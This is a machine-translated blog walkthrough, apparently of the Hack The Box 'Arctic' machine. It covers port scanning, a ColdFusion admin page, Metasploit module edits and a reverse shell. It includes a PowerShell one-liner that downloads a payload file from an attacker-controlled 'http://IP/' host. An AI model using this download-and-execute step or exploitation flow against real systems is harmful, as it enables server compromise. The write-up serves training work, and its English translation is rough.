当前位置:网站首页>HTB-Arctic
HTB-Arctic
2022-07-25 05:41:00 【It's always late at night.】

HTB-Arctic
information gathering
after nmap After scanning, only the following information was found .

And there is one of these ports fmtp The service is a little different , Go to the browser and have a look , Loading is a little slow .
stay CFIDE I saw Administrator file .
After loading ColdFusion Login interface .
So much information has been collected so far .
Turn it on
Go first exploit-db have a look

Go again msf have a look 
Try two first excellent Of , The first upload failed for unknown reasons , It is speculated that the delay problem may lead to the failure , After modifying the time, it still fails , For a .
This one is also a failure , Consider delay , Go to source code modification delay .

Take these two 5 Change it a little bit .

After modifying and saving, return to msf, Execute first reload heavy load payload, Run again .
When you want to raise the right, you find that this task cannot be switched to the background , Then collect some information and make a pedal .
First find CFIDE The position of , See at a glance wwwroot, Then generate …… Why don't I directly generate .exe Well , All the wwwroot Just accept it here .
powershell "(new-object System.Net.WebClient).Downloadfile('http://IP/ file name ', ' file name ')"

Gained a rebound shell After use suggester An error will appear saying that the user has interrupted , However, I did nothing .
Doubt may be this rebound shell yes 32 The goal is 64 position , in !
64 It's the same with you , I still have no operation , It also reports an error that the user interrupted the operation , All right .
I can only ask for strategies .( Please forgive the blogger for being too stupid , I don't know the solution )

边栏推荐
- Three schemes for finclip to realize wechat authorized login
- An SQL execution process
- Zhanrui's first 5g baseband chip was officially released and successfully ranked among the first tier of 5g!
- The u-collapse component of uniapp mobile uview is highly init
- Era5 dataset description
- Leetcode 204. 计数质数(太妙了)
- For data security reasons, the Dutch Ministry of Education asked schools to suspend the use of Chrome browser
- background
- systemVerilog中automatic用法
- CSDN编程挑战赛之数组编程问题
猜你喜欢

JWT(json web token)

ECS is exclusive to old users, and the new purchase of the remaining 10 instances is as low as 3.6% off
![50: Chapter 5: develop admin management service: 3: develop [query whether the admin user name already exists, interface]; (this interface can only be called when logging in; so we have written an int](/img/1b/b8529b6f1d163a9e5d5dad2b78ce93.png)
50: Chapter 5: develop admin management service: 3: develop [query whether the admin user name already exists, interface]; (this interface can only be called when logging in; so we have written an int

编程大杂烩(二)

聊聊 Redis 是如何进行请求处理

sqlilabs less-29

sqlilabs less-28~less-8a

传输线理论之相速、相位等的概念

HTB-Devel

Idea commonly used 10 shortcut keys
随机推荐
The computer accesses the Internet normally with the same network cable, and the mobile phone connects to WiFi successfully, but it cannot access the Internet
R language uses wilcox.test function to perform Wilcox signed rank test to obtain confidence interval of population median (set conf.level parameter to specify confidence level and size of confidence
Three schemes for finclip to realize wechat authorized login
2021年ICPC陕西省赛热身赛 B.CODE(位运算)
Leetcode 15: sum of three numbers
计算BDP值和wnd值
10、渲染基础
Equal proportion of R language test group: use the prop.test function to test whether the success proportion of the two groups is equal
Vim配置Golang开发环境
The global shipment of glory 8x series exceeded 10million units, and the glory V20 exceeded 1.5 million units!
2020ICPC 江西省赛热身赛 E.Robot Sends Red Packets(dfs)
编程大杂烩(一)
ECS is exclusive to old users, and the new purchase of the remaining 10 instances is as low as 3.6% off
Oracle 用户A删除用户B名下的一张表后,用户B可以通过回收站恢复被删除的表吗?
微服务 - 配置中心 - Nacos
剑指 Offer 05. 替换空格
npx和npm区别
MATLAB作图实例:5:双轴图
Application of hard coding and streaming integration scheme based on spice protocol in cloud games
Airserver 7.3.0 Chinese version mobile device wireless transmission computer screen tool